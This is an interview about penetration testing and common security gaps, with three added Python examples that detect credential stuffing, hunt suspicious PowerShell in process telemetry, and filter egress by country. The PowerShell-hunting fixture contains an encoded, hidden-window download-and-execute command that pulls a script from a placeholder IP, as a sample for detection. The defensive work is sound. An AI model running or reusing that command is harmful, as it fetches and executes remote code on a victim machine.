Know Your Vulnerabilities: A Q&A with Michael Nelson, Steve Greenawalt, and Ken Pyle of DFDR Consulting, LLC
When a cyber event occurs, companies are often surprised by just how exposed they are to attack. Penetration testing conducted by an outside party will reveal those security issues that can be difficult to detect from the inside. We talked to Michael Nelson, Steve Greenawalt, and Ken Pyle of DFDR Consulting, LLC, about the vulnerabilities revealed by testing and the top six problems they see most frequently.
What can penetration testing tell a risk manager or insured about their organization’s cyber readiness?
KP: Companies invest in security controls and protections such as firewalls, antivirus applications, and other measures, but they often need an outside perspective to ensure these investments are working as they should. We think of penetration testing as a due diligence tool. It’s about finding what nobody was aware of––such as a vendor’s product with zero day exposure. It also helps the company understand what a cyberattack looks like and how to both identify and counter the attack when it happens.
SG: The automobile industry provides a helpful illustration for this topic. If you drive a car, then you’re probably familiar with the concept of crash testing and reliability data, which offer valuable information to the potential buyer.
Third party performance testing plays a similar role for your security systems. Once the test is complete, you can identify systemic issues that have been overlooked or vendor issues that need to be addressed. It can boost your confidence in the reliability and effectiveness of the security policies and procedures already in place.
How often should organizations undertake penetration testing? Or, under what circumstances would it be indicated?
MN: Depending on the industry, the frequency of penetration testing may be determined by compliance standards. As a rule of thumb, you should undertake testing once a year. But, testing may be needed sooner if your organization undergoes major changes, such as new personnel or technology upgrades. Organizations are also advised to undergo a quarterly vulnerability assessment, which is a semi-automated process aimed at identifying and prioritizing weaknesses in the system.
What is threat hunting?
SG: Threat hunting is an ongoing practice that takes the organization’s security to the next level by moving past a reliance on passive measures such as firewalls and anti-virus software. Threat hunting begins with the assumption that someone has already infiltrated the environment. The purpose is to gain a deeper understanding of the environment and detect anomalous activities that might be attributable to malicious actors.
There are a number of different ways to go about doing this, depending on the resources available and the maturity of the organization’s controls. One strategy is to focus on endpoint detection and response solutions (EDR).
EDR solutions record very granular telemetry data about the processes, network connections, and file modifications that are occurring on every monitored workstation and server. That data is then analyzed for indicators of compromise. Organizations with more advanced systems might implement user behavior analytics in an effort to detect insider threats.
What are the top six types of problems your team discovers through penetration testing services?
1. Patch Management
SG: A lot of organizations tend to rely on Microsoft and its automatic updates. Unfortunately, that’s far from the only software that requires updating. Organizations are probably also using Adobe products, Java, a financial suite, an ERP suite, not to mention business applications on their workstations and servers.
There is also a need to regularly update firmware on firewalls, routers, switches, and other infrastructure devices. Companies tend to have a poor awareness of the risk exposures present in their environments because their patch management programs are insufficient.
By way of illustration, EternalBlue is a Windows exploit developed by the National Security Agency (NSA). In April 2017, a hacker group called the Shadow Brokers leaked the program a month after Microsoft had released patches for the vulnerability. When run against a vulnerable system, EternalBlue gives Administrator privileges to an unauthenticated attacker on the system.
Almost three years later, our security team continues to find this vulnerability in the majority of our security engagements. A successfully installed Windows update, which has been available for years, is all that is required to fix this issue.
2. Access Management/Password Hygiene
KP: All too often, device, application, and manufacturer credentials are left unchanged on their default “out of the box” setting. All it takes is that basic password that was never changed, and an adversary can crack the perimeter or move laterally through your network.
Using the same password across sites is another major issue. We can assume that many of our usernames and passwords have been published on the dark web as a result of numerous data breaches. If you’re reusing these sensitive credentials across sites, the bad guy can use credential stuffing to hack your systems.
Credential stuffing is the act of using stolen username and password combinations to gain access to accounts such as Facebook, Netflix, Amazon, or corporate networks through automated login requests.
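The credential-stuffing pattern described above has a recognizable footprint in login logs: one source address cycling through many distinct usernames in a short window, with mostly failures and the occasional success. The following is an added example of detection logic over constructed log lines; it is not DFDR's tooling, and the log format, window size and thresholds are assumptions for illustration.

```python
"""Flag credential-stuffing patterns in web login logs: a single source
address trying many distinct usernames inside a short window with a high
failure ratio.  Example code added to this page; the log lines and the
log format are constructed, not taken from any real system."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: timestamp, source ip, username, result.
# 198.51.100.7 walks a leaked username/password list; 203.0.113.9 is
# one user mistyping a password; 192.0.2.44 is a normal login.
LOG = """\
2020-03-02T10:00:01 198.51.100.7 alice FAIL
2020-03-02T10:00:02 198.51.100.7 bob FAIL
2020-03-02T10:00:02 198.51.100.7 carol FAIL
2020-03-02T10:00:03 198.51.100.7 dave OK
2020-03-02T10:00:04 198.51.100.7 erin FAIL
2020-03-02T10:00:05 198.51.100.7 frank FAIL
2020-03-02T10:00:06 198.51.100.7 grace FAIL
2020-03-02T10:00:07 198.51.100.7 heidi FAIL
2020-03-02T10:00:08 198.51.100.7 ivan FAIL
2020-03-02T10:00:09 198.51.100.7 judy FAIL
2020-03-02T10:00:10 198.51.100.7 mallory FAIL
2020-03-02T10:01:00 203.0.113.9 alice FAIL
2020-03-02T10:01:05 203.0.113.9 alice FAIL
2020-03-02T10:01:09 203.0.113.9 alice OK
2020-03-02T10:02:00 192.0.2.44 bob OK
"""


def parse(log_text):
    """Turn the constructed log text into a list of event dicts."""
    events = []
    for line in log_text.splitlines():
        ts, ip, user, result = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "ip": ip,
                       "user": user, "ok": result == "OK"})
    return events


def detect_stuffing(events, window=timedelta(minutes=5),
                    min_users=8, min_fail_ratio=0.8):
    """Sliding window per source IP.  An IP is flagged when, within one
    window, it tried at least `min_users` distinct usernames and at least
    `min_fail_ratio` of those attempts failed.  Thresholds are assumed
    values; tune them to the site's normal login behaviour.
    Returns {ip: {distinct_users, fail_ratio, accounts_to_reset}}."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            users = {e["user"] for e in span}
            ratio = sum(1 for e in span if not e["ok"]) / len(span)
            if len(users) >= min_users and ratio >= min_fail_ratio:
                # Successful logins from a stuffing source are the accounts
                # whose reused password just worked: reset them first.
                hits = sorted({e["user"] for e in span if e["ok"]})
                prev = findings.get(ip)
                if prev is None or len(users) > prev["distinct_users"]:
                    findings[ip] = {"distinct_users": len(users),
                                    "fail_ratio": round(ratio, 2),
                                    "accounts_to_reset": hits}
    return findings


if __name__ == "__main__":
    for ip, info in detect_stuffing(parse(LOG)).items():
        print(ip, info)
```

The distinct-username count is what separates stuffing from a single user fat-fingering a password, which is why 203.0.113.9 is not flagged even though most of its attempts fail; the successful account from the flagged source is the one to force a reset on.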
SG: We’ve found a real lack of awareness when it comes to the implementation of the least-privilege principle. This principle says that end users and applications should be granted only the bare minimum of permissions necessary to complete their duties. In theory, this sounds easy enough, but it can be difficult to implement effectively across an organization. Malicious actors are able to leverage lapses in least privilege to their advantage.
3. Lack of Inventory Awareness
SG: Another thing we see is that organizations often have no awareness or visibility into the hardware and software assets on their network.
KP: If they don’t know what exists in their environment, then it’s certain that they’re not properly maintaining, patching, or decommissioning the equipment or software once it is no longer used. Many times these assets are related to virtual servers or cloud solutions, which you forget about because you aren’t seeing them.
Or, employees will leave the organization, yet their accounts remain active. This is particularly true for developers utilizing multiple accounts for different purposes, or for a shared account whose credentials never change and are known to multiple individuals.
MN: Once an attacker has found their way into the network, they can use these tools to further their foothold or even take full control—completely undetected. If attackers move around the network using the same tools and methods as the administrator, you might never know someone else has gained access.
KP: PowerShell is a good example of the type of tool that can be used in this way. PowerShell is often unrestricted for use on workstations. Scripted attacks utilizing this tool can be quite sophisticated and bypass code controls even while appearing innocuous. It’s kind of like leaving the drill and lock picks by the safe and saying, “Take a shot if you want!”
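Both the EDR telemetry hunting described in the threat-hunting answer above and the PowerShell abuse described here come down to the same thing: process-creation records analyzed for patterns an administrator would not normally produce. The following is an added example, not DFDR's or any EDR vendor's code, that hunts over a constructed set of process events for two classic tells: an Office application spawning a shell or script host, and PowerShell launched with an encoded command, which it decodes so an analyst can read what was run. The event field names are assumptions standing in for whatever the EDR product exports.

```python
"""Hunt over process-creation telemetry for two living-off-the-land tells:
an Office application spawning a shell/script host, and PowerShell run
with -EncodedCommand (base64 of UTF-16LE script).  Example code added to
this page; the events are constructed and the field names are assumed,
not the schema of any real EDR product."""
import base64
import re


def encode_command(script):
    """Encode a script the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample of process events: parent image, child image, command line.
EVENTS = [
    {"host": "ws01", "user": "jdoe", "parent": "explorer.exe",
     "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"host": "ws01", "user": "jdoe", "parent": "winword.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"host": "srv02", "user": "svc_backup", "parent": "services.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "ws07", "user": "asmith", "parent": "excel.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Return (host, rule, detail) findings for the suspicious events."""
    findings = []
    for ev in events:
        parent, image = ev["parent"].lower(), ev["image"].lower()
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append((ev["host"], "office-spawns-shell",
                             f"{parent} -> {image}"))
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            findings.append((ev["host"], "powershell-encoded-command", decoded))
    return findings


if __name__ == "__main__":
    for host, rule, detail in hunt(EVENTS):
        print(f"{host}\t{rule}\t{detail}")
```

The scheduled backup script on srv02 is deliberately left alone: PowerShell itself is not the indicator, the combination of parent process, hidden window and encoded payload is. Restricting PowerShell on workstations to Constrained Language Mode and enabling script block logging turns the same decoded content into a log entry you can hunt on without an EDR.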
4. Poor Vendor Management
KP: Many companies are simply not aware of the risks that vendors bring into the picture. Oftentimes, they have a vendor agreement in place for protection but one that doesn’t spell out the rules of engagement.
The client believes that since they outsourced the role, they don’t have to worry about it. In reality, there may be serious problems happening. For example, perhaps the vendor never enabled logging or access control. Often, vendors set up a single administrator account and then share it with all staff members.
Penetration testing tools help you to find the answers to questions such as whether the vendor is using the same credentials for all their clients. We have seen this in engagements: We were able to use credentials that certain vendors are known to use to gain access. Is the vendor changing the credentials when an employee leaves? On a number of breach response engagements, we have identified a departed employee using the shared information to log into the victim’s environment.
MN: Simply because you are bringing in a vendor or outsourcing does not mean you are no longer responsible for your network or data. You should retain the ability to see what is occurring and what security practices the vendor is using.
5. Lack of Geo IP Filtering
MN: Many times, clients worry about what’s coming into their network but don’t focus on the traffic that is leaving. If a business is U.S. based and doesn’t have clients in China, Russia, or North Korea, then it should be blocking inbound and outbound traffic at the firewall, which can cut down on malware and botnets. This is a proactive measure you can take to eliminate threats.
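The egress side of the rule above is the part most firewalls are not configured for. As an added example, not DFDR's code, the following classifies outbound flows by destination country against a country-to-prefix table and splits them into allowed and denied. The table here is constructed from RFC 5737 documentation ranges and carries no real geography; in practice it would be loaded from a GeoIP database or the firewall vendor's country objects, which is an assumption of this example.

```python
"""Classify outbound connections by destination country and deny those to
countries the business has no reason to talk to.  Example code added to
this page.  The prefix table is constructed from RFC 5737 documentation
ranges and is NOT real geolocation data; a production version would load
a GeoIP feed (e.g. a MaxMind GeoLite2 download) instead."""
import ipaddress

# Constructed: country code -> list of prefixes.  Purely illustrative.
COUNTRY_PREFIXES = {
    "US": ["192.0.2.0/24"],
    "CN": ["198.51.100.0/25"],
    "RU": ["198.51.100.128/25"],
    "KP": ["203.0.113.0/24"],
}
# Countries this (assumed U.S.-only) business does not do business with.
BLOCKED = {"CN", "RU", "KP"}

# Constructed sample of outbound flows: (source, destination, dst port).
FLOWS = [
    ("10.0.0.15", "192.0.2.80", 443),
    ("10.0.0.15", "198.51.100.200", 443),
    ("10.0.0.22", "203.0.113.7", 8080),
    ("10.0.0.22", "192.0.2.10", 53),
]


def build_table(prefixes):
    """Flatten the country map into (network, country) pairs, most specific
    prefix first so the longest match wins when ranges overlap."""
    table = [(ipaddress.ip_network(net), country)
             for country, nets in prefixes.items() for net in nets]
    table.sort(key=lambda t: t[0].prefixlen, reverse=True)
    return table


def country_of(ip, table):
    """Longest-prefix lookup; None when the address is in no known range."""
    addr = ipaddress.ip_address(ip)
    for net, country in table:
        if addr in net:
            return country
    return None


def filter_egress(flows, table, blocked=BLOCKED):
    """Return (allowed, denied); denied tuples carry the matched country.
    Unknown destinations are allowed here; failing closed on unknown
    ranges is the stricter policy and is a deliberate choice to make."""
    allowed, denied = [], []
    for src, dst, port in flows:
        country = country_of(dst, table)
        if country in blocked:
            denied.append((src, dst, port, country))
        else:
            allowed.append((src, dst, port))
    return allowed, denied


if __name__ == "__main__":
    allowed, denied = filter_egress(FLOWS, build_table(COUNTRY_PREFIXES))
    for entry in denied:
        print("DENY ", entry)
    for entry in allowed:
        print("ALLOW", entry)
```

A denied outbound flow to a port like 443 or 8080 from a workstation is exactly the beacon traffic the answer above refers to: logging those denies, not just dropping them, is what turns the firewall rule into a detection.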
6. Lack of Will to Change
SG: Occasionally, we run into clients who get penetration testing services because they have a compliance requirement but don’t have the desire to fix what is identified during the test. If steps aren’t taken to remediate the issues, subsequent tests may identify the same deficiencies year after year. As a result, the insured may be accused of negligence by the insurer during the claims process, by regulators during a breach, or by the courts during litigation. If you do engage with testing, you should be prepared to address the problems that emerge.
NetDiligence on Why Penetration Testing Matters
We would like to thank DFDR Consulting for their expert insights into the topic of penetration testing. At NetDiligence®, we find that a penetration test is one of the most valuable measures an organization can undertake on a proactive basis to get the “hacker’s view” of its network.
Our cyber risk insurance community requires this type of due diligence on occasion in order to gauge whether a policyholder’s network is reasonably patched to prevent or deflect many common exploits.
And, as summarized by DFDR’s excellent list above, a pen-test will typically uncover dozens to hundreds of red flags even at well-prepared organizations. The fact is that protecting information assets that reside in multiple repositories while managing a network with public internet-facing endpoints is challenging even for the best of Chief Security Officers.
To learn more about how to do penetration testing and what the service might look like for your organization, we encourage you to reach out to us at NetDiligence by calling 814-360-0408.